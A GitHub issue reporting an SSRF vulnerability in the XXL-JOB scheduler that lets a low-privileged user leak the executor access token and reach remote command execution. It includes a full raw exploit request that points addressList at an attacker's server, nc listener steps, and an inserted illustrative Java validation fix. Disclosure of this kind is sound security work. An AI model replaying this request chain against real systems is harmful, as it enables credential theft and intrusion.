
xxl-job <= 2.4.1 version has SSRF vulnerability, which causes low-privileged users to control executor to RCE #3375

Closed
JOHN-FROD opened this issue Jan 11, 2024 · 1 comment

Comments


JOHN-FROD commented Jan 11, 2024

Which version of XXL-JOB are you using?

2.4.1(latest)

Vulnerability description

XXL-JOB is a distributed task scheduling platform based on the Java language, from the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.4.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobInfoController.java of Xxl-job 2.4.1, originating from /trigger: it directly sends a request to the address specified by addressList without checking whether the addressList parameter is a valid executor address. This creates the SSRF vulnerability; the attacker obtains the XXL-JOB-ACCESS-TOKEN and calls any executor, causing execution of arbitrary commands on the executor.
Calling the /trigger interface only requires a low-privilege user of the platform.

Steps to reproduce the behavior

Conditions:

  • XXL-JOB <= 2.4.1 (latest version)
  • Regular user account
  • Know a JobId (which can be obtained by traversal)

  1. Create a normal user "normal" without any executor permissions.
  2. Call the interface as the normal user with the input parameter addressList set to the HTTP server address; the XXL-JOB-ACCESS-TOKEN is printed directly on the target server:
POST /xxl-job-admin/jobinfo/trigger HTTP/1.1
Host: 10.248.28.212:8080
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.248.28.212:8080
Referer: http://10.248.28.212:8080/xxl-job-admin/jobinfo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d
Connection: close

id=1&executorParam=test&addressList=http%3A%2F%2F10.248.28.212%3A9999

  3. nc on the VPS
  4. Use the token to call the task trigger interface of the executor's RESTful API to execute arbitrary commands

Other information

The vulnerability is similar to CVE-2022-43183.
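The missing check the report describes, as an added, hypothetical example (not XXL-JOB's own code): a caller-supplied addressList is accepted only when every entry matches an executor address registered for the job's group, so a low-privileged caller cannot point the scheduler at an arbitrary host. The registered addresses, the `resolveAddressList` helper and the rejected sample input are constructed for this illustration; address normalization is assumed to mirror how the registry stores addresses.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;

// Hypothetical server-side validation for a /trigger-style endpoint.
public class TriggerAddressCheck {

    // Executor addresses registered for a job group (constructed sample data).
    static final Set<String> REGISTERED = new LinkedHashSet<>(Arrays.asList(
            "http://10.248.28.212:9999/",
            "http://10.248.28.213:9999/"));

    // Normalize so "http://host:port" and "http://host:port/" compare equal.
    static String normalize(String addr) {
        String a = addr.trim().toLowerCase();
        return a.endsWith("/") ? a : a + "/";
    }

    /**
     * Returns the executor addresses the scheduler may dispatch to.
     * An empty addressList means "use the registered addresses".
     * Any entry that is not a registered executor is rejected outright;
     * the request is never sent to an unregistered host.
     */
    static List<String> resolveAddressList(String addressList, Set<String> registered) {
        if (addressList == null || addressList.trim().isEmpty()) {
            return new ArrayList<>(registered);
        }
        List<String> accepted = new ArrayList<>();
        for (String raw : addressList.split(",")) {
            if (raw.trim().isEmpty()) continue;
            String addr = normalize(raw);
            if (!registered.contains(addr)) {
                throw new IllegalArgumentException("address not registered for this job group: " + raw.trim());
            }
            accepted.add(addr);
        }
        return accepted;
    }

    public static void main(String[] args) {
        System.out.println(resolveAddressList("http://10.248.28.212:9999", REGISTERED)); // accepted
        try {
            resolveAddressList("http://attacker-controlled.invalid:9999", REGISTERED); // constructed bad input
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```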

xuxueli (Owner) commented Apr 17, 2024

Hello, the relevant fix logic has been pushed to the master branch and will be released with the 2.4.1 version.

@xuxueli xuxueli closed this as completed Apr 17, 2024